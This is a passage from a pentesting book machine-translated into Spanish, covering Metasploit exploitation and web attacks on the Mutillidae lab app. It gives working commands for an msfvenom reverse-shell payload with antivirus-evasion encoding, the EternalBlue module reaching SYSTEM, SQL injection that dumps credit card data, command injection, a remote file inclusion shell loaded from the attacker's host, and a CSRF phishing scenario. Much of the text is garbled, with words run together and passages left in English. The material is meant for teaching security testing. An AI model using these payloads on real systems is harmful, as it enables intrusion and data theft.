Metasploit Comencemos con un ejemplo práctico para que pueda comprender cómo funciona en el terreno. En nuestro ejemplo actual, generaremos una carga útil de Windows/Meterpreter usando MSFvenom primero (recuerde que LHOST es la dirección IP de Kali y LPORT es el puerto en el que queremos escuchar): root@kali:~# msfvenomÿpwindows/meterpreter/ reverse_tcpLHOST=172.16.0.102LPORT=1111ÿfexe>shell.exe [-]Noseseleccionóningunaplataforma,eligiendoMsf::Module::Platform::Windowsfromthepayload [-]Noarchselected,selectingarch:x86fromthepayload Noencoderorbadcharsspecified , emitiendo carga útil sin procesar Tamaño de carga útil: 341 bytes Tamaño final del archivo exe: 73802 bytes A continuación, comenzaremos a escuchar en ese puerto utilizando el módulo de controlador múltiple en Metasploit. msf5> useexploit/multi/handler msf5exploit (multi/handler)> setpayloadwindows/ meterpreter/reverse_tcp msf5exploit (multi/handler)> setLPORT1111 msf5exploit (multi/handler)> exploit En esta etapa, todo lo que necesitamos es transferir esta carga útil ( shell.exe ) a la unidad de host de nuestra víctima de Windows. Una vez que la ejecutamos, debemos obtener un Meterpretershell: [*]Se inició el controlador TCP inverso en 172.16.0.102:1111[*]Enviando la etapa (176195bytes) a 172.16.0.100 [*]Meterpretersession1 abrió (172.16.0.102:1111->172.16.0.100:49177) a las 2020-06-2702-:39:39:39 0400 metro preter> Más adelante en este libro, aprenderá cómo proceder desde esta etapa de privilegio Canal de Telegram : @IRFaraExam Machine Translated by Google escalationandpivotingusingMeterpreter. MSFvenenoopciones Para gestionar bien MSFvenom, deberá dominar sus opciones. Esta es la plantilla de un comando típico: $msfvenom-p[nombre de carga útil]–plataforma[Sistema operativo]-e[codificador]f[formato]–out[nombre de archivo de salida] Para obtener una lista de todas las cargas compatibles, use lo siguiente (use el comando grep para filtrar los resultados): $msfvenom-lpayloads Para obtener una lista de todas las plataformas admitidas (p. ej., Windows, Linux, etc.), use lo siguiente: $msfvenom-lplataformas Para obtener una lista de todos los codificadores admitidos (para eludir el software antivirus), use lo siguiente: $msfvenom-lencoders También puede codificar la carga útil varias veces usando el indicador ÿi . A veces, más iteraciones pueden ayudar a evitar la protección antivirus, pero sepa que la codificación no está realmente destinada a ser utilizada como una solución de evasión antivirus real: $msfvenom-pwindows/meterpreter/bind_tcp-ex86/shikata_ga_nai-i3 Por último, para obtener una lista de todos los formatos de archivo compatibles con MSFvenom, configure: $msfvenom--formatos de ayuda Explotación del protocolo SMB El protocolo Samba ha sido un servicio explotable popular en los últimos años. Los principales exploits en Metasploita están relacionados con las vulnerabilidades de SMB. Conexión a recursos compartidos SMB Una vez que vea que el puerto 445 está abierto durante la fase de enumeración, puede Canal de Telegram : @IRFaraExam Machine Translated by Google proceda intentando conectarse a estos directorios. Para enumerar las carpetas compartidas en un host remoto, utilicemos el módulo smb_enumshares de Metasploit : msf5> useauxiliary/scanner/smb/smb_enumshares msf5auxiliary(scanner/smb/smb_enumshares)> setRHOSTS 172.16.0.100 RHOSTS=>172.16.0.100 msf5auxiliary(escáner/smb/smb_enumshares)> setSMBUseradmin SMBUser=>admin msf5auxiliary(escáner/smb/smb_enumshares)> setSMBPassadmin SMBPass=>admin msf5auxiliary(escáner/smb/smb_enumshares)>ejecutar [+]172.16.0.100:445-ADMIN$ÿ (DISCO)RemoteAdmin [+]172.16.0.100:445-Cÿ(DISCO) [+]172.16.0.100:445-C$ÿ(DISK)Defaultshare [+]172.16.0.100:445-IPC$ÿ (IPC)RemoteIPC [*]172.16.0.100:-Análisis de 1 de 1 hosts (100 % completo) [*]Ejecución del módulo auxiliar completada Encontramos cuatro directorios compartidos en el host de Windows anterior. En Kali, puede acceder a un recurso compartido SMB de forma remota mediante el explorador de carpetas del sistema operativo. Asegúrese de ingresar la siguiente ruta en el Administrador de archivos de Kali (vea la Figura 7.25): Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.25 SMBConnect smb://[dirección IP] Una vez que ingrese la dirección IP correcta, se le pedirá que ingrese las credenciales (en mi caso, es admin:admin). Cuando haga clic en el botón Conectar, tendrá acceso visual completo a los recursos compartidos remotos (consulte la Figura 7.26). Figura 7.26 Conexión SMB establecida Canal de Telegram : @IRFaraExam Machine Translated by Google SMBEternalBlueExploit Estamos utilizando este tema como un ejemplo de la razón. Este exploit azul eterno fue popular hace algunos años, y Microsoft ya lo parcheó. Pero como está aprendiendo sobre el aprovechamiento, entonces tiene que ver cómo funciona. Nuevamente, usaremos Metasploit y ejecutaremos el módulo ms17_010_eternalblue : Más _ _ _ RHOSTS=>172.16.0.100 msf5exploit(windows/smb/ms17_010_eternalblue)> setSMBUSERadmin SMBUSER=>admin msf5exploit(windows/smb/ms17_010_eternalblue)> setSMBPASSadmin SMBPASS=>admin msf5exploit(windows/smb/ms17_010_eternalblue)> explotar [*]IniciadocontroladorTCPreversoen172.16.0.102:4444[*]172.16.0.100:445Usandoauxiliary/scanner/smb/smb_ms17_010ascheck [+]172.16.0.100:445HostisprobablementeVULNERABLEparaMS17-010!-Windows7Professional17601ServicePack4bit) [*]172.16.0.100:445-Análisis de 1 de 1 hosts (100 % completo) [*]172.16.0.100:445-Conectando al objetivo para la explotación. […] meterpreter> getuid Nombre de usuario del servidor:NTAUTHORITY\SYSTEM Resumen La explotación es divertida e idealmente disfrutó este capítulo. El aprendizaje debe ser una actividad divertida y no una tarea ardua. Los materiales que aprendió le permitirán avanzar a los siguientes pasos, que son la escalada de privilegios y el movimiento lateral. Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 8 Vulnerabilidades de aplicaciones web En este capítulo, aprenderá los aspectos básicos de las vulnerabilidades de las aplicaciones web. La seguridad de las aplicaciones es una categoría en sí misma, y dado que necesitaríamos un libro completo para cubrir todos los temas de seguridad de las aplicaciones, usaremos este capítulo para cubrir solo los más obvios. Gran parte de lo que aprenderá en este capítulo le permitirá probar las aplicaciones web antes de implementarlas en el entorno de producción. DevSecOpsi tiene que ver con asegurarse de que la canalización pueda entregar una aplicación web segura. Cada empresa necesita realizar cambios en su sitio web, pero antes de implementar los cambios en producción, deben pasar por una canalización de integración continua/implementación continua (CI/CD). Como analista de seguridad, su función es detectar cualquier vulnerabilidad con anticipación antes de implementar los cambios en el entorno de producción. Si retrocede en el tiempo (10 años o más), notará que solíamos tener aplicaciones de Windows, pero hoy en día, la tendencia ha cambiado y la mayoría de los proyectos están basados en la web o en la nube. En este capítulo, aprenderá sobre lo siguiente: Secuencias de comandos entre sitios Inyección SQL comandoinyección Inclusión de archivos Falsificación de solicitud entre sitios Omisión de carga de archivos Vulnerabilidades de aplicaciones web El backend de las aplicaciones web se crea utilizando diferentes lenguajes de programación. Los más populares son Java, C#.NET (Framework/Core) y PHP. Canal de Telegram : @IRFaraExam Machine Translated by Google como Angular, React, etc. Además, la interfaz usará CSS para decorar la apariencia de las páginas web. Asasecurityprofessional, youmustknowthebasicsofwebapplication vulnerabilities.Also, youshouldlearnhowtobuildawebapplicationfromAto Z (it'sbesttolearnbypracticing) .Youcan'tjustusescannersandsendyour reportswithoutvalidation.Tovalidatethevulnerabilitieslikeaprofessional, que mustunderstandwebapplicationprogramming.Atthebeginning, pickoneprogramminglanguageforthebackend youcanjust (por ejemplo, C # .NETCore) Andone JavaScriptframeworkforthefrontend (por ejemplo, angular). MutillidaeInstalación Para aprender los principios de esta sección, usaremos la aplicación web vulnerable llamada Mutillidae y usaremos Ubuntu para alojar esta aplicación web. 1.Instalarelservidorweb. 2. Configure el cortafuegos. 3.Instalar PHP. 4. Instale y configure la base de datos. Instalación del servidor web Apache Primero, instale un servidor web Apache para alojar el sitio web. En esta etapa del libro, debería poder manejar los comandos del terminal: $aptupdate&&aptupgrade-y $aptinstallyapache2apache2-utils $a2enmodrewrite $systemctlrestartapache2 $systemctlenableapache2 Configuración del cortafuegos No queremos que el cortafuegos de Ubuntu bloquee la comunicación HTTP durante nuestras pruebas. Hay dos tipos de cortafuegos preinstalados en Ubuntu Linux: iptables ufw Canal de Telegram : @IRFaraExam Machine Translated by Google Ejecutemos dos comandos para cambiar (desbloquear) cada tipo de firewall (solo para estar en el lado completo): $ iptables-IINPUT-ptcp - dport80-jACCEPT $ ufwallowhttp Instalación de PHP PHP es el lenguaje de programación en el que se basa este sitio web. Por lo tanto, necesitamos instalar el marco para ejecutar el código fuente en el host de Ubuntu: $aptinstall-yphp7.4libapache2-mod-php7.4php7.4-mysqlphp commonphp7.4-cliphp7.4commonphp7.4-jsonphp7.4-opcachephp7.4-readlinephp7.4-curlphp7.4-mbstringphp7.4-xml Instalación y configuración de la base de datos Los datos del sitio web deben almacenarse en una base de datos. Mutillidae guardará los datos en una base de datos MySQL. Instalaremos MariaDB, que se basa en el motor MySQL: $aptinstallmariadb-servermariadb-client-y $systemctlenablemariadb Para permitir que la aplicación web acceda a esta base de datos, necesitaremos actualizar los permisos del usuario raíz de la base de datos. Para hacer el trabajo, ejecutaremos los siguientes comandos (tenga en cuenta que una vez que ejecute el primer comando, ingresará los comandos interactivos de MySQL): $mysql-uroot >usemysql; >updateusersetauthentication_string=PASSWORD('mutillidae')whereuser='root'; >updateusersetplugin='mysql_native_password'whereuser='root'; >privilegios de descarga; >salir De acuerdo con los comandos anteriores, cambiamos la contraseña del usuario de root a mutillidae. MutillidaeInstalación Ahora que tenemos todos los componentes instalados, debemos descargar los archivos binarios del sitio web desde GitHub. Además, debemos crear una carpeta mutillidae en el directorio del servidor web / var / www / html : Canal de Telegram : @IRFaraExam Machine Translated by Google $ cd / var / www / html / $ aptinstallgit-y $ gitclonehttps: //github.com/webpwnized/mutillidae.gitmutillidae $ systemctlrestartapache2 Para abrir la aplicación web Mutillidae, abra un navegador web en su servidor Ubuntu y diríjase a localhost / mutillidae , como se muestra en la figura 8.1. Figura 8.1 Página de inicio de Mutillidae La primera vez que visite el sitio, se le notificará que la base de datos está fuera de línea. Haga clic en el enlace Configurar/ Restablecer la base de datos y será redirigido a la página Restablecer base de datos. Script entre sitios Cross-sitescripting (XSS) clientscriptsonthevictim'sclientbrowser isaweaknessthatcanbeexploitedbyexecuting (por ejemplo, JavaScript) .Thisflawexists whenthedeveloperoftheapplicationdoesnotvalidatetheinputdataproperly onthebackend.Wheneveryouseetextonthewebpagethatcanbemanipulated withuserinput, itmeansthereisaprobabilitythatitisvulnerabletoXSS.Don't worryifyoudon'tunderstandthisrightnow; wewillpracticeittogether.The followingaretwocomm Canal de Telegram : @IRFaraExam Machine Translated by Google ReflejadoXSS AlmacenadoXSS ReflejadoXSS AreflectedXSSflawcanbeexploitedbymanipulatinganyinput (por ejemplo, aURL, cuadro de texto, HiddenField, etc.) ToexecuteJavaScriptontheclient'sbrowser.To practicethisscenario, selectOWASP2017ÿA7-CrossSiteScripting (XSS) ÿ reflejada (de primer orden) ÿDNSLookup.Onthispageyouaresimplytryingto gettheDNSnamebehindanIPaddressthatyousupplyinatextbox.Next, introduzca 172.16.0.1 astheIPaddressoftherouterandclicktheLookupDNSbutton. Mire de cerca los resultados de salida que se muestran en la figura 8.2. La dirección IP se imprime en los resultados del mensaje para 172.16.0.1. En otras palabras, usamos el cuadro de texto (un campo de entrada del usuario) y se imprimió en la página. Figura 8.2 Mutillidae– DNSLookup A continuación, reemplazaremos el valor de la dirección IP en el cuadro de texto con algún código de JavaScript. Si el código se ejecuta, entonces la página es vulnerable a un XSS reflejado. Inyecte un mensaje emergente simple de JavaScript, como se muestra aquí: <script>alerta('HolaKCorp')</script> Si funciona, entonces puede ejecutar cualquier JavaScript malicioso a su gusto. De hecho, KaliLinux tiene un marco completo para las bibliotecas XSSJavaScript; consulte el marco de explotación del navegador (BeEF). Ahora, si hacemos clic en el botón Buscar DNS, el script se ejecutará y una alerta emergente mostrará el mensaje en la Figura 8.3. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.3 Mutillidae–ScriptAlert Para que este ataque funcione, deberá convencer a la víctima de que haga clic en la página vulnerable. En este caso, el usuario debe morder el anzuelo utilizando algún tipo de ataque de ingeniería social avanzada (por ejemplo, correo electrónico de phishing). AlmacenadoXSS El XSS almacenado es similar al reflejado (ambos ejecutarán la carga útil de JavaScript). La única diferencia es que el XSS almacenado guardará el JavaScript en un sistema de almacenamiento (por ejemplo, una base de datos). Este es peligroso porque es persistente en la página vulnerable. Cualquier usuario que visite esa página será infectado por la carga útil de JavaScript. Para probar este escenario en Mutillidae, seleccione OWASP 2017ÿA7–CrossSite Scripting(XSS)ÿPersistente(SecondOrder)ÿAddToYourBlog . Una vez que haga clic en Guardar entrada de blog, verá un mensaje emergente con el número 0. Si intenta volver a esta página, siempre verá este mensaje emergente ya que está guardado dentro de la tabla del blog. NOTA Puede restablecer la base de datos en cualquier momento que desee haciendo clic en el enlace Restablecer base de datos en la barra de menú superior. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.4 Mutillidae– BlogEntry Explotación de XSSU mediante el encabezado Otra forma de inyectar JavaScript en una página es a través del encabezado de solicitud. Si el administrador guarda cada solicitud de encabezado con fines de revisión y registro, puede aprovechar este comportamiento, pero ¿cómo ? Seleccione OWASP2017ÿA7– CrossSiteScripting(XSS)ÿPersistente (SecondOrder)ÿShow Logtogetthere. Figura 8.5 Troncos de Mutillidae Esta página mostrará los encabezados de cada solicitud web a esta aplicación web para Canal de Telegram : @IRFaraExam Machine Translated by Google registros. La tercera columna muestra el agente del navegador desde el encabezado de la solicitud. Usemos Burp para interceptar la solicitud y cambiemos el agente del navegador. Ya ha visto un ejemplo durante la fase de enumeración de cómo preparar Burp para la interceptación. Para que esto funcione, necesitamos lo siguiente: El navegador debe utilizar un proxy (en el puerto 8080). Necesitamos cargar Burp y asegurarnos de abrir la pestaña Proxy y luego la subpestaña Interceptar, que tiene un botón Interceptar. Visitemos cualquier página web sobre Mutillidae, usando la página de inicio, e interceptémosla usando Burp (vea la Figura 8.6). Figura 8.6 Burpsuite –ProxyIntercept Modifique el valor del agente de usuario, reemplácelo con un mensaje de alerta de JavaScript (consulte la Figura 8.7) y haga clic en el botón Adelante. Después de hacer clic en Adelante, informe a Burp para detener la intercepción. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.7 BurpSuite –UserÿAgentEditar Cuando volvamos a la página de registros, deberíamos obtener una alerta emergente de JavaScript. Recuerde que lo que hicimos aquí es XSS almacenado, los registros se almacenan en una base de datos para que el administrador pueda leerlos cuando quiera. OmitirJavaScriptValidation JavaScriptvalidationisamisconceptionfornovicedevelopers.Theyaddthe validationinthefrontendJavaScriptcode, andtheydon'timplementitonthe backend. (Inourcase, thebackendisPHP.) BurpSuitewillcometotherescue againandallowustointercepttherequestandinjectourpayload.Toenablethis securityfeature (JavaScriptvalidation), wewillclicktheToggleSecuritytop menuitem.Oncethesecuritylevelissetto1, wewilltrytoinjectthe Hola JavaScriptcodeintheDNSLookuppagethatweusedearlier.Thistime, la pagewillnotexecutetheJavaScriptcode, anditwillshowusamessagesaying thatit'snotallowed, asshownin Figure8.8 (porque hay una validación en el código front-end). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.8 Mutillidae– BadCharactersErrorMessage Para pasar por alto la validación de JavaScript, comenzaremos la interceptación usando Burp. A continuación, ingresaremos una dirección IP válida (8.8.8.8, como se muestra en la Figura 8.9) y haremos clic en el botón Buscar DNS. Si cambiamos a la pestaña Proxy Burp, deberíamos ver la solicitud web. Podemos ver la dirección IP en el contenido de la solicitud de POS. Todo lo que debemos hacer en esta etapa es reemplazar la dirección IP con el script de prueba, como se muestra en la Figura 8.10. Después de realizar los cambios, haga clic en el botón Adelante y detenga la intercepción haciendo clic en el botón Intercept Is On. Cuando cambiamos a la página web de búsqueda de DNS, deberíamos ver que el JavaScript se ha ejecutado correctamente. ¿Por qué sucedió esto? Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.9 BurpSuite –InterceptPayload Figura 8.10 BurpSuite –TargetHostScript Inyección SQL La inyección de SQL (SQLi) es mi vulnerabilidad web favorita y es la más peligrosa. SQLi permitirá que un usuario malicioso ejecute comandos SQL a través del navegador web. Puede hacer mucho con los comandos SQL, como los siguientes: Consultar la base de datos con el comando select (por ejemplo, puede seleccionar todos los registros de los usuarios y robar información confidencial) Omita la página de inicio de sesión utilizando la declaración verdadera en SQL Ejecutar comandos del sistema y, además, tener un shell remoto, por ejemplo Manipule los datos mediante los comandos SQL de inserción / eliminación / actualización Consultar la base de datos Canal de Telegram : @IRFaraExam Machine Translated by Google Permítame mostrarle algunas consultas SQL antes de proceder a explotar esta debilidad. Esta aplicación web vulnerable creó una base de datos llamada mutillidae dentro , y de esta base de datos, hay una tabla llamada cuentas (consulte la Figura 8.11). Para comenzar con un comando simple, consultaremos la prueba de nombre de usuario que ya creamos en la aplicación web. Usaremos DBeaver como cliente de base de datos gráfica para ejecutar esta consulta, como se muestra en la Figura 8.12. Figura 8.11 Tabla de cuentas Figura 8.12 AccountsTableÿSQLQuery ¿Qué pasa si podemos engañar a la base de datos para seleccionar todos los registros de la tabla de cuentas ? Usaremos el carácter de comentario (ÿ ÿ) para ignorar alguna parte de la consulta. Canal de Telegram : @IRFaraExam Machine Translated by Google Tenga en cuenta que necesitamos agregar un espacio después de los guiones dobles. Como ejemplo, ingresaremos los siguientes datos en el formato de búsqueda de usuario http://localhost/ mutillidae/index.php?page=user-info.php, como se muestra en la Figura 8.13: Figura 8.13 LoginSQLi Nombre de usuario=prueba'o1=1ÿ ÿ Contraseña=cualquier cosa La comilla simple cerrará el valor de la cadena de nombre de usuario y la declaración or1=1 devolverá una declaración booleana verdadera. Figura 8.14 showshowtheSQLstatementwilllook . Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.14 LoginSQLiQuery Como puede ver en la figura, el comando ha consultado todos los registros en la tabla de cuentas . Por lo tanto, debe ejecutarse en la página web cuando hacemos clic en el botón Ver detalles de cuenta. Normalmente, la página debe mostrar solo una cuenta, pero, en este caso, todos los registros se obtendrán de la tabla debido a la carga de cuatro consultas SQL, como se muestra en la Figura 8.15. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.15 Resultados de LoginSQLi Pasar por alto la página de inicio de sesión Lógicamente hablando, el código PHP utilizará el siguiente algoritmo durante la fase de inicio de sesión: 1. Busque el nombre de usuario ingresado en el cuadro de texto del nombre de usuario y la contraseña ingresada en el cuadro de texto de la contraseña. 2. Si existe algún registro en la base de datos, inicie sesión. 3. Si no se encuentran registros, el usuario recibirá un mensaje de error. Según la consulta de la Figura 8.12, reutilizaremos la misma carga útil que inyectamos en el truco anterior. Esta vez, usaremos la página de inicio de sesión en su lugar, como se muestra en la Figura 8.16. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.16 Mutillidae–LoginSQLi Recuerde que o 1=1 devolverá verdadero, y todo lo que siga se ignorará debido a los caracteres de comentario (guiones dobles). Por lo tanto, si la base de datos devuelve una afirmación verdadera , el usuario podrá iniciar sesión con el primer registro de usuario seleccionado en la tabla, que es admin, como se muestra en la Figura 8.17. (Consulte la Figura 8.14 para ver el primer registro). Ejecutar comandos de base de datos mediante SQLi En esta sección, aprovecharemos otra debilidad en las consultas SQL que nos permitirá ejecutar comandos SQL. En el ejemplo anterior, vimos la combinación de la declaración OR true y los comentarios que nos permitieron obtener una declaración verdadera. En esta sección, usaremos el comando unionselect para consultar los datos que estamos buscando. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.17 Mutillidae–LoginSQLiResults En la página Búsqueda de usuarios, ingrese los detalles que se muestran en la Figura 8.18. Figura 8.18 Sintaxis de SQLi-UnionSelect Una vez que haga clic en Ver detalles de la cuenta, recibirá el siguiente mensaje de error: /var/www/html/mutillidae/classes/MySQLHandler.phponline224:Error al ejecutar la consulta: connect_errno:0 número de error: 1222 error: Las sentencias SELECT usadas tienen un número diferente de columnas info_cliente:mysqlnd7.4.3 host_info:127.0.0.1a través de TCP/IP * FROMcuentasWHEREusername=''unionselect1,2 ' -)Consulta:SELECTANDpassword='cualquier cosa'(0)[Excepción] El mensaje nos dice que la tabla de cuentas que estamos tratando de usar en el la base de datos tiene más de dos columnas. Generalmente, puede incrementar el número hasta que ya no vea un mensaje de error. En nuestro ejemplo, vamos a hacer trampa ya que sabemos que esta tabla tiene siete columnas ( consulte la Figura 8.11). Figura Canal de Telegram : @IRFaraExam Machine Translated by Google 8.19 muestra lo que sucede cuando ingresamos el número correcto de columnas. Figura 8.19 SQLi : selección de unión De acuerdo con el resultado, pudimos imprimir el número 2 en el campo de nombre de usuario, 3 en el campo de contraseña y 4 en el campo de Firma. En el siguiente paso, reemplazaremos el número 2 por el comando VERSION() que mostrará el número de versión de la base de datos, como se muestra en la Figura 8.20. Figura 8.20 SQLi : selección de unión con versión de base de datos Ahora que vio cómo funciona, es hora de pasar a un escenario más complejo. Usemos el poder de SQL para consultar todos los nombres de tabla en la base de datos (los ejemplos usan DBeaver para mayor claridad ) . Canal de Telegram : @IRFaraExam Machine Translated by Google Hay una tabla interesante llamada nombres de tarjetas , por lo general es 'inspectcolumn' de crédito. Esta vez, usaremos la tabla de columnas de esquema de información y mostrar los valores de column_name donde el nombre de la tabla es igual a credit_cards . Consulte la Figura 8.22. Finalmente, vamos a volcar los datos de la tabla de tarjetas de crédito. Concatenar los resultados usando la función concat y use 0x3A como un limitador. Vea la Figura 8.23 ( 0x3A es equivalenttoacolon,:). Figura 8.21 SchemaTable –CreditCardsField Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.22 CreditCardsTableQuery Figura 8.23 Extraer datos de tabla de tarjetas de crédito Ahora ya sabe cómo los piratas informáticos roban tarjetas de crédito de los sitios web. Le insto a que no utilice este conocimiento de mala fe. Figura 8.24 SQLQuery –WriteToSystem Fue un buen intento, pero desafortunadamente, el sistema no nos permitió escribir en el disco. SQLInjectionAutomationwithSQLMap SQLMap es popular, por lo general, vea cómo usarlo en caso de que desee hacerlo rápidamente Canal de Telegram : @IRFaraExam Machine Translated by Google La mayoría de las veces, no uso SQLMap durante mis compromisos (lo uso en los desafíos de CTF), sino que uso Burp ProScanner para encontrar vulnerabilidades de SQLi. Los principios que acaba de aprender en la sección anterior son los que utilizo cuando pruebo la inyección de SQL. Rastrear las URL de la aplicación web para encontrar un enlace vulnerable: $sqlmap-u[URL]--rastreo=1 Para averiguar si la inyección SQL es válida, configure: $ sqlmap-u [URL] banner Para seleccionar el nombre del servidor de la base de datos (p. ej., mysql ) durante las pruebas de inyección de SQL, configure: $ sqlmap [URL] - dbms [db] Esto ayudará al escáner a inyectar los parámetros y caracteres correctos. Si encuentra que el objetivo es vulnerable y desea enumerar las bases de datos, utilice: $ sqlmap-u [URL] - dbs Si desea listar las tablas dentro de una base de datos específica, configure: $sqlmap-u[URL]–D[nombrebd]--tablas Para volcar el contenido de una tabla (p. ej., tabla de usuarios), configure: $sqlmap-u[URL]-D[nombrebd]-T[nombretabla]--dump Intente obtener un shell de sistema operativo utilizando lo siguiente: $sqlmap-u[URL]--os-shell TestingforSQLInjection ¿Cómo sabe que una página es vulnerable a la inyección de SQL? Hay dos formas de hacerlo: Intente inyectar una sola cita en la entrada de la página (URL, cuadro de texto, encabezado, etc.). Si obtiene un error de SQL, entonces es vulnerable. Trate de usar una herramienta automatizada (por ejemplo, BurpProScanner) para probar Canal de Telegram : @IRFaraExam Machine Translated by Google Inyección blindSQL. AblindSQLi no mostrará un mensaje de error, pero la página aún podría ser vulnerable a esta falla. Si desea ejecutar esto manualmente, puede probar el método de tiempo para retrasar el tiempo de carga de la página. Probemos este enfoque en la página de búsqueda de usuarios de Mutillidae e insertemos un carácter de comillas simples en el campo Nombre, como se muestra en la Figura 8.25. Figura 8.25 Error de SQLi Como puede ver, la página muestra un mensaje de error que nos dice que SQL El servidor no entendió la siguiente consulta: Seleccionar*desdecuentasdondenombredeusuario="ycontraseña=" CommandInjection El concepto de inyección de comandos es simplemente ser capaz de ejecutar comandos a su gusto en una página web. Cuando vea una página que ofrece la ejecución de comandos, entonces es su deber probar si es vulnerable a esta falla. Veamos un ejemplo práctico de inyección de comandos usando la aplicación web Mutillidae. Seleccione Owasp2017ÿA1–Injection(Other)ÿCommandInjectionÿ DNSLookup. Dado que esta página ejecutará un comando de búsqueda de DNS para mostrarle los resultados, entonces es probable que sea vulnerable a esta falla. ¿Qué sucede realmente en el back-end cuando ingresa una dirección IP? Canal de Telegram : @IRFaraExam Machine Translated by Google ejecutando el siguiente comando (con la dirección IP como variable de parámetro): nslookup[dirección IP] Si el desarrollador no validó el parámetro, podemos aprovecharlo. Nuestro objetivo es hacer que el backend ejecute algo como lo siguiente (recuerde que && agregará varios comandos al mismo tiempo): nslookup[dirección IP]&&[comando del sistema operativo] Para probar este enfoque, usemos el comando ls (vea la Figura 8.26) ya que la aplicación web Mutillidae está almacenada en un servidor Linux. Figura 8.26 Mutillidae: inyección de comandos ¿Qué sigue? Dado que nuestro comando ls de prueba de concepto se ha ejecutado correctamente, ahora podemos reemplazarlo con un comando de shell remoto. ArchivoInclusión La inclusión de archivos se puede explotar apuntando a una ruta de archivo (local o remotamente) usando la URL. Si el archivo es local en el servidor web, entonces lo llamamos inclusión de archivo local , y si el archivo es remoto , entonces lo llamamos inclusión de archivo remoto . Canal de Telegram : @IRFaraExam Machine Translated by Google LocalFileInclusionLocalFileInclusion La inclusión de archivos locales (LFI) se explota mediante la inyección de una ruta de archivo en la URL que apunta al servidor web local. Considere que tenemos una aplicación web vulnerable que carga la página de inicio de la siguiente manera: http://[nombre de dominio]/home.asp?file=login.html Como puede ver, la aplicación está usando la cadena de consulta del archivo para cargar la página HTML de inicio de sesión. ¿Qué pasa si podemos cambiar eso con otra página en el sistema de archivos? http://[nombre de dominio]/home.asp?file=../../../../etc/passwd A ver si podemos aplicar el ejemplo anterior en la aplicación web Mutillidae. Cuando visitemos la página de inicio, veremos la siguiente URL: http://localhost/mutillidae/index.php?page=home.php Eso es interesante porque la página está usando la variable de cadena de consulta para cargar dinámicamente un archivo en el servidor ( que es home.php en este caso). Veamos si podemos reemplazar el valor home.php con la ruta del archivo passwd (vea la Figura 8.27). Figura 8.27 Mutillidae: extracción del archivo de contraseña ¡Increíble! Ahora es su turno de explotarlo. Más adelante en este libro, aprenderá la lista de archivos que necesitará verificar en cada tipo de sistema operativo. Por el momento, concentrémonos en comprender el concepto. RemoteFileInclusionRemoteFileInclusion La inclusión de archivos remotos (RFI) se aprovecha al poder cargar un archivo remoto Canal de Telegram : @IRFaraExam Machine Translated by Google alojado en otro servidor web. Para lograr este objetivo, deberá poder cargar el archivo con algo como esto: http://[nombre de dominio]/page.php?file=[URL remota]/shell.php Practiquemos el patrón anterior en la siguiente URL en Mutillidae: http://localhost/mutillidae/index.php?page=arbitrary-file inclusion.php Antes de explotarlo, necesitaremos hacer un cambio en el archivo php.ini en el servidor host. En este caso, el archivo se encuentra en /etc/php/7.4/apache2/php.ini . Abraelarchivoyasegúresedetenerlossiguientesvalores: Allow_url_fopen=Activado Allow_url_include=Activado Una vez que localice estas dos variables, asegúrese de guardar el archivo. A continuación, reinicie el servidor web: $servicioapache2restart En esta etapa, preparemos un script PHP que nos permitirá ejecutar el comando ls . Podemos alojar el archivo PHP en nuestro host Kali (asegúrese de que el servidor web esté instalado). Cree el archivo shell.txt en nuestro host Kali en la siguiente ruta: /var/www/ . html/shell.txt root@kali:~#cd/var/www/html/ root@kali:/ var/www/html#serviceapache2start root@kali:/var/www/ html#echo"<?phpechoshell_exec("ls");?> ">shell.txt ¡Increíble! Ahora podemos invocar este script de forma remota desde el servidor web de Mutillidae (consulte la Figura 8.28): Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.28 Mutillidae: inclusión de archivos remotos KaliIP: 172.16.0.102 MutillidaeUbuntuHostIP: 172.16.0.107 En esta etapa, puede reemplazar el comando ls con el script de shell remoto que sea compatible con el servidor remoto (p. ej., Python, Perl, etc.). PROPINA Ejecute el comando which para encontrar el shell compatible que desea ejecutar. Por ejemplo, el comando which python le mostrará la ruta al ejecutable de Python si está instalado en el servidor remoto. Falsificación de solicitud entre sitios La falsificación de solicitudes entre sitios (CSRF) se explota aprovechando la sesión del usuario para ejecutar una solicitud de formulario POST en su nombre. CSRF (pronunciado por algunas personas como “seasurf”) puede ser efectivo en blogs o redes sociales, por ejemplo. Antes de continuar con nuestro ejemplo, debe conocer los conceptos básicos para poder probar una vulnerabilidad CSRF. Cuando un usuario se autentica en un sitio web, una cookie de sesión Canal de Telegram : @IRFaraExam Machine Translated by Google se creará únicamente para esta persona. En segundo lugar, esta cookie de sesión permanecerá activa hasta que caduque, incluso si cambia a otro sitio. Para este ejemplo, usaremos, nuevamente, la página de blog de la aplicación web Mutillidae (consulte la Figura 8.29): http://[Dirección IP]/mutillidae/index.php?page=add-to-your-blog.php Figura 8.29 MutillidaeBlogPage Llevemos este ataque más lejos y visualicemos un escenario real. Elliot, el atacante, quiere hackear a su víctima, Angela, de KCorp. Veamos la acción. El escenario del atacante Elliot analizará el contenido de la página e identificará que este blog es vulnerable a CSRF. Luego, creará una página maliciosa para infectar a Angela. (Ellio está usando la versión Pro de Burp, no la gratuita). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.30 BurpSuite : generar CSRFPoC Una vez que haga clic en Generar CSRFPoC, aparecerá una ventana emergente. A continuación, Elliot copiará el código generado utilizando el botón Copiar HTML, como se muestra en la Figura 8.31. Luego, el atacante guardará el código HTML en un archivo en el servidor web de su kalihost: /var/www/html/csrf.html En esta etapa, Elliot debe realizar un paso final. Enviará un correo electrónico de phishing a Angel para convencerla de que visite el siguiente enlace: http://[KaliIP]/csrf.html Además, Elliot intentará asegurarse de que Angela abra la página de su blog en una pestaña separada del navegador (recuerde que en el ataque CSRF necesitamos la sesión de la víctima). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.31 BurpSuite : generar 